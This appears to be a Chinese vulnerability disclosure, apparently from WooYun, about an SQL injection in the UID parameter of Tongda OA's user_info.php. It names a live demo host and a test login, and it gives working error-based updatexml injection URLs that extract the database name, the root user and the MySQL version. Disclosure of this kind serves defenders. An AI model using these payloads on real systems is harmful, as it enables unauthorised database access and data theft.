通达OA某处SQL注入，root权限(demo测试)

### 简要描述： RT ### 详细说明： 通达OA(国际版)某处SQL注入，demo成功演示 大神提交那么多，吓我一跳： [WooYun: 通达T9 oa系统sql注射12处打包(demo站点root权限)](http://www.wooyun.org/bugs/wooyun-2014-082959) 还好没重复。 存在漏洞的文件为：/general/ipanel/user/user_info.php 参数UID存在注入 国际版演示demo地址：http://t9.go2oa.com:86/ 测试帐号及密码 cw/无 [<img src="https://images.seebug.org/upload/201503/131053036f610ce8d1ab2fb385b515a8f51a13c4.png" alt="0313_1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/131053036f610ce8d1ab2fb385b515a8f51a13c4.png) 访问URL：http://t9.go2oa.com:86/general/ipanel/user/user_info.php?UID=1&USER_ID=admin 正常显示： [<img src="https://images.seebug.org/upload/201503/13105831d14e90e731bf5c0a38efe803a7bf65c1.png" alt="0305_2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/13105831d14e90e731bf5c0a38efe803a7bf65c1.png) 正常访问情况下，档案信息处提示： ``` 未设置公开字段 ``` [<img src="https://images.seebug.org/upload/201503/131059222fd20e504a8c5a88f36cd93e642696e9.png" alt="0305_3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/131059222fd20e504a8c5a88f36cd93e642696e9.png) 参数UID处输入：' 提示报错，如图： [<img src="https://images.seebug.org/upload/201503/13110950444075389ce457ef9f7172d4a7b6fa4b.png" alt="0305_4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/13110950444075389ce457ef9f7172d4a7b6fa4b.png) '被转义了，发现注入地方出在()内，所以构造，继续输入and 1=1和and 1=2 [<img src="https://images.seebug.org/upload/201503/13110044502d78fde5848fbe7f54caf9b44cad87.png" alt="0305_5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/13110044502d78fde5848fbe7f54caf9b44cad87.png) 报错注入，如图： 获取数据库 ``` http://t9.go2oa.com:86/general/ipanel/user/user_info.php?UID=1) and 1=((updatexml(1,concat(0x24,(select database()),0x24),1))&USER_ID=admin ``` [<img src="https://images.seebug.org/upload/201503/131102266a7697a7c69682fc028354abbdf2aff6.png" alt="0305_6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/131102266a7697a7c69682fc028354abbdf2aff6.png) 数据库： ``` td_oa ``` 获取用户： ``` http://t9.go2oa.com:86/general/ipanel/user/user_info.php?UID=1) and 1=((updatexml(1,concat(0x24,(select user()),0x24),1))&USER_ID=admin ``` [<img src="https://images.seebug.org/upload/201503/13110320d011429e820ac93bba4df8777706e636.png" alt="0305_7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/13110320d011429e820ac93bba4df8777706e636.png) ``` root@127.0.0.1 ``` 数据库版本： ``` http://t9.go2oa.com:86/general/ipanel/user/user_info.php?UID=1) and 1=((updatexml(1,concat(0x24,(select version()),0x24),1))&USER_ID=admin ``` [<img src="https://images.seebug.org/upload/201503/131106547c0cd345abe3702bc26a79b8c1eadbb2.png" alt="0305_8.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/131106547c0cd345abe3702bc26a79b8c1eadbb2.png) 后面的操作就不一一演示了。。。 ### 漏洞证明： 见详细说明。。。